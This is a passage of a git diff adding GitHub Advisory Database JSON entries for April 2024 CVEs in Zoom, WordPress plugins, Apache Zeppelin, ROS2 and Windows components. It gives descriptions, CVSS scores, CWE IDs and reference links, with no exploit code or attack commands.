b/advisories/unreviewed/2024/04/GHSA-rr32-xpf4-hwj6/GHSA-rr32-xpf4-hwj6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr32-xpf4-hwj6", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-24694" + ], + "details": "Improper privilege management in the installer for Zoom Desktop Client for Windows before version 5.17.10 may allow an authenticated user to conduct an escalation of privilege via local access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24694" + }, + { + "type": "WEB", + "url": "https://www.zoom.com/en/trust/security-bulletin/zsb-24011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rrrg-rj55-27wm/GHSA-rrrg-rj55-27wm.json b/advisories/unreviewed/2024/04/GHSA-rrrg-rj55-27wm/GHSA-rrrg-rj55-27wm.json new file mode 100644 index 00000000000..ce993132572 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rrrg-rj55-27wm/GHSA-rrrg-rj55-27wm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrrg-rj55-27wm", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2222" + ], + "details": "The Advanced Classifieds & Directory Pro plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the ajax_callback_delete_attachment function in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with subscriber access or higher, to delete arbitrary media uploads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2222" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-classifieds-and-directory-pro/trunk/admin/admin.php#L757" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-classifieds-and-directory-pro/trunk/public/user.php#L689" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3054455%40advanced-classifieds-and-directory-pro%2Ftrunk&old=3012747%40advanced-classifieds-and-directory-pro%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc5da189-838d-4c0b-a734-283c4da36473?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rrvf-5w4r-3x7v/GHSA-rrvf-5w4r-3x7v.json b/advisories/unreviewed/2024/04/GHSA-rrvf-5w4r-3x7v/GHSA-rrvf-5w4r-3x7v.json new file mode 100644 index 00000000000..aa29c4a4f09 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rrvf-5w4r-3x7v/GHSA-rrvf-5w4r-3x7v.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrvf-5w4r-3x7v", + "modified": "2024-04-09T18:30:22Z", + "published": "2024-04-09T18:30:22Z", + "aliases": [ + "CVE-2024-31868" + ], + "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nThe attackers can modify helium.json and exposure XSS attacks to normal users.\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31868" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4728" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/55mqs673plsxmgnq7fdf2flftpllyf11" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-116" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rrxr-p69x-ghh9/GHSA-rrxr-p69x-ghh9.json b/advisories/unreviewed/2024/04/GHSA-rrxr-p69x-ghh9/GHSA-rrxr-p69x-ghh9.json new file mode 100644 index 00000000000..9a185aff0a1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rrxr-p69x-ghh9/GHSA-rrxr-p69x-ghh9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrxr-p69x-ghh9", + "modified": "2024-04-10T15:30:37Z", + "published": "2024-04-10T15:30:37Z", + "aliases": [ + "CVE-2024-30707" + ], + "details": "Unauthorized node injection vulnerability in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to escalate privileges and inject malicious ROS2 nodes into the system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30707" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30707" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rvh5-mpf7-h5hf/GHSA-rvh5-mpf7-h5hf.json b/advisories/unreviewed/2024/04/GHSA-rvh5-mpf7-h5hf/GHSA-rvh5-mpf7-h5hf.json new file mode 100644 index 00000000000..e57425e4d2c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rvh5-mpf7-h5hf/GHSA-rvh5-mpf7-h5hf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvh5-mpf7-h5hf", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26255" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26255" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26255" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rwg6-5v43-7mq2/GHSA-rwg6-5v43-7mq2.json b/advisories/unreviewed/2024/04/GHSA-rwg6-5v43-7mq2/GHSA-rwg6-5v43-7mq2.json new file mode 100644 index 00000000000..75c5aace3ab --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rwg6-5v43-7mq2/GHSA-rwg6-5v43-7mq2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwg6-5v43-7mq2", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26235" + ], + "details": "Windows Update Stack Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26235" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26235" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rwv9-q2h8-5644/GHSA-rwv9-q2h8-5644.json b/advisories/unreviewed/2024/04/GHSA-rwv9-q2h8-5644/GHSA-rwv9-q2h8-5644.json new file mode 100644 index 00000000000..89062bae11e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rwv9-q2h8-5644/GHSA-rwv9-q2h8-5644.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwv9-q2h8-5644", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26158" + ], + "details": "Microsoft Install Service Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26158" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26158" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rx2w-fqqj-rp5m/GHSA-rx2w-fqqj-rp5m.json b/advisories/unreviewed/2024/04/GHSA-rx2w-fqqj-rp5m/GHSA-rx2w-fqqj-rp5m.json new file mode 100644 index 00000000000..483c98ab4a4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rx2w-fqqj-rp5m/GHSA-rx2w-fqqj-rp5m.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx2w-fqqj-rp5m", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3529" + ], + "details": "A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been classified as problematic. This affects an unknown part of the file students_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259899.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3529" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%202.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259899" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259899" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312520" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v249-g5w5-7hcv/GHSA-v249-g5w5-7hcv.json b/advisories/unreviewed/2024/04/GHSA-v249-g5w5-7hcv/GHSA-v249-g5w5-7hcv.json new file mode 100644 index 00000000000..1cf52e5ec0d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v249-g5w5-7hcv/GHSA-v249-g5w5-7hcv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v249-g5w5-7hcv", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2650" + ], + "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the alignment parameter in the Woo Product Carousel widget in all versions up to, and including, 5.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2650" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3058018%40essential-addons-for-elementor-lite%2Ftrunk&old=3050196%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7242d808-9c33-4b3f-bda6-b4b72ca37de9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v2jv-hxvv-r7j7/GHSA-v2jv-hxvv-r7j7.json b/advisories/unreviewed/2024/04/GHSA-v2jv-hxvv-r7j7/GHSA-v2jv-hxvv-r7j7.json new file mode 100644 index 00000000000..85a9f563a09 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v2jv-hxvv-r7j7/GHSA-v2jv-hxvv-r7j7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2jv-hxvv-r7j7", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30716" + ], + "details": "An insecure logging vulnerability in ROS2 Dashing Diademata ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attacks to obtain sensitive information via inadequate security measures implemented within the logging mechanisms of ROS2.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30716" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30716" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v3cc-gxvr-wp29/GHSA-v3cc-gxvr-wp29.json b/advisories/unreviewed/2024/04/GHSA-v3cc-gxvr-wp29/GHSA-v3cc-gxvr-wp29.json new file mode 100644 index 00000000000..5281c91926c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v3cc-gxvr-wp29/GHSA-v3cc-gxvr-wp29.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3cc-gxvr-wp29", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-27631" + ], + "details": "Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27631" + }, + { + "type": "WEB", + "url": "https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=d3962d3feb75467489b869204db98e2dffaaaf09" + }, + { + "type": "WEB", + "url": "https://medium.com/%40allypetitt/how-i-found-3-cves-in-2-days-8a135eb924d3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v429-7w83-5cc5/GHSA-v429-7w83-5cc5.json b/advisories/unreviewed/2024/04/GHSA-v429-7w83-5cc5/GHSA-v429-7w83-5cc5.json new file mode 100644 index 00000000000..b79422e150d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v429-7w83-5cc5/GHSA-v429-7w83-5cc5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v429-7w83-5cc5", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31255" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ELEXtensions ELEX WooCommerce Dynamic Pricing and Discounts allows Reflected XSS.This issue affects ELEX WooCommerce Dynamic Pricing and Discounts: from n/a through 2.1.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31255" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/elex-woocommerce-dynamic-pricing-and-discounts/wordpress-elex-woocommerce-dynamic-pricing-and-discounts-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v45f-j4h4-qjp6/GHSA-v45f-j4h4-qjp6.json b/advisories/unreviewed/2024/04/GHSA-v45f-j4h4-qjp6/GHSA-v45f-j4h4-qjp6.json new file mode 100644 index 00000000000..18b056a6424 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v45f-j4h4-qjp6/GHSA-v45f-j4h4-qjp6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v45f-j4h4-qjp6", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-3350" + ], + "details": "A vulnerability, which was classified as critical, has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected by this issue is some unknown functionality of the file admin/mod_room/index.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259454 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3350" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-03" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310218" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v4p3-mv8c-jvgx/GHSA-v4p3-mv8c-jvgx.json b/advisories/unreviewed/2024/04/GHSA-v4p3-mv8c-jvgx/GHSA-v4p3-mv8c-jvgx.json new file mode 100644 index 00000000000..7d0f7acd32f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v4p3-mv8c-jvgx/GHSA-v4p3-mv8c-jvgx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4p3-mv8c-jvgx", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26215" + ], + "details": "DHCP Server Service Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26215" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26215" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v5g8-p43f-vv3p/GHSA-v5g8-p43f-vv3p.json b/advisories/unreviewed/2024/04/GHSA-v5g8-p43f-vv3p/GHSA-v5g8-p43f-vv3p.json new file mode 100644 index 00000000000..fd97204c615 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v5g8-p43f-vv3p/GHSA-v5g8-p43f-vv3p.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5g8-p43f-vv3p", + "modified": "2024-04-06T21:30:35Z", + "published": "2024-04-06T21:30:35Z", + "aliases": [ + "CVE-2024-27620" + ], + "details": "An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27620" + }, + { + "type": "WEB", + "url": "https://everywall.github.io" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/177506/Ladder-0.0.21-Server-Side-Request-Forgery.html" + }, + { + "type": "WEB", + "url": "http://ladder.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v5gh-4369-4w97/GHSA-v5gh-4369-4w97.json b/advisories/unreviewed/2024/04/GHSA-v5gh-4369-4w97/GHSA-v5gh-4369-4w97.json new file mode 100644 index 00000000000..1bb451f4b57 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v5gh-4369-4w97/GHSA-v5gh-4369-4w97.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5gh-4369-4w97", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-1956" + ], + "details": "The wpb-show-core WordPress plugin before 2.7 does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1956" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/d7034ac2-0098-48d2-9ba9-87e09b178f7d" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v74g-7hwm-jpjc/GHSA-v74g-7hwm-jpjc.json b/advisories/unreviewed/2024/04/GHSA-v74g-7hwm-jpjc/GHSA-v74g-7hwm-jpjc.json new file mode 100644 index 00000000000..427d52d1da8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v74g-7hwm-jpjc/GHSA-v74g-7hwm-jpjc.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v74g-7hwm-jpjc", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2023-6385" + ], + "details": "The WordPress Ping Optimizer WordPress plugin through 2.35.1.3.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as clearing logs.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6385" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/362c56ff-85eb-480f-a825-9670d4c0e3d0" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v832-7hv6-458x/GHSA-v832-7hv6-458x.json b/advisories/unreviewed/2024/04/GHSA-v832-7hv6-458x/GHSA-v832-7hv6-458x.json new file mode 100644 index 00000000000..1f37c9d8480 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v832-7hv6-458x/GHSA-v832-7hv6-458x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v832-7hv6-458x", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29045" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29045" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29045" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v92r-jqh2-f2xx/GHSA-v92r-jqh2-f2xx.json b/advisories/unreviewed/2024/04/GHSA-v92r-jqh2-f2xx/GHSA-v92r-jqh2-f2xx.json new file mode 100644 index 00000000000..3142b48f49b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v92r-jqh2-f2xx/GHSA-v92r-jqh2-f2xx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v92r-jqh2-f2xx", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2261" + ], + "details": "The Event Tickets and Registration plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.8.2 via the RSVP functionality. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including emails and street addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2261" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/event-tickets/tags/5.8.2&old=3059268&new_path=/event-tickets/tags/5.8.3&new=3059268&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e42dd1c-adf7-471a-a14a-9038c56413a2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-v9hm-fcq5-j7h7/GHSA-v9hm-fcq5-j7h7.json b/advisories/unreviewed/2024/04/GHSA-v9hm-fcq5-j7h7/GHSA-v9hm-fcq5-j7h7.json new file mode 100644 index 00000000000..3cd97fc7156 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-v9hm-fcq5-j7h7/GHSA-v9hm-fcq5-j7h7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9hm-fcq5-j7h7", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2024-31806" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a Denial-of-Service (DoS) vulnerability in the RebootSystem function which can reboot the system without authorization.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31806" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/DoS_RebootSystem/DoS.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-vf3g-q2rg-c398/GHSA-vf3g-q2rg-c398.json b/advisories/unreviewed/2024/04/GHSA-vf3g-q2rg-c398/GHSA-vf3g-q2rg-c398.json new file mode 100644 index 00000000000..a31b2bd8f7c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-vf3g-q2rg-c398/GHSA-vf3g-q2rg-c398.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf3g-q2rg-c398", + "modified": "2024-04-08T12:30:32Z", + "published": 